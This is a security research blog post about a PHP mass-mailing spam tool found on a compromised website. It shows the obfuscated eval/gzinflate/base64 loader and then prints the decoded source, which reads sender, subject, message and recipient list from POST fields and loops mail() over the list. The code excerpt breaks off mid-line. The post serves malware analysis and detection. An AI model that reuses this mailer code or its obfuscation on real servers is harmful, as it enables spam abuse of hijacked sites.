PHP Spam tool (UnixStats Mass MaiLer) Posted on June 28, 2012by Daniel Cid While looking at a compromised site, we found an interesting mass mailer in there. The contentwas encoded using eval/gzinflate and base64_decode: <?php eval(gzinflate(base64_decode("1RprcxM58jtV/AehyyZ2rcdjOwkb7NjAhrBLFQGWhLvbAio1npFtLfNC.....</code></pre> <p>But when switching the "eval" for "print" we could see the mass mailer hidden and what it was doing:</p> <p><textarea cols=100 rows=20>$secure = "racrewmania@googlemail.com"; @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; set_time_limit(intval($_POST['timelimit'])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to......."; flush(); $header = "From: $realname <$from>rnReply-To: $replytorn"; $header .= "MIME-Version: 1.0rn"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uidrn"; If ($file_name) $header .= "--$uidrn"; $header .= "Content-Type: text/$contenttypern"; $header .= "Content-Transfer-Encoding: 8bitrnrn"; $header .= "$messagern"; If ($file_name) $header .= "--$uidrn"; If ($file_name) $header .= "Content-Type: $file_type; name="$file_name""rn""; If ($file_name) $header .= ""Content-Transfer-Encoding: base64rn""; If ($file_name) $header .= ""Content-Disposition: attachment; filename=""$file_name""rnrn""; If ($file_name) $header .= ""$contentrn""; If ($file_name) $header .= ""--$uid--""; mail($to</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> </article><!-- #post-1108 --> </main><!-- #main --> </div><!-- #primary --> </div><div> <nav class="navigation post-navigation" aria-label="Posts"> <h2 class="screen-reader-text">Post navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://labs.sucuri.net/flagging-google-com-as-malware/" rel="prev">Flagging google.com as malware</a></div><div class="nav-next"><a href="https://labs.sucuri.net/strange-htaccess-redirections-to-google-com/" rel="next">Strange .htaccess redirections to google.com</a></div></div> </nav> </div><!-- #content --> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div> <!-- /.container --> </div> </footer> </div><!-- #page --> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215' id='sucurikb-navigation-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215' id='sucurikb-skip-link-focus-fix-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1' id='foundation-js-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1' id='sucuri-wp-custom-js-js'></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> </body> </html>
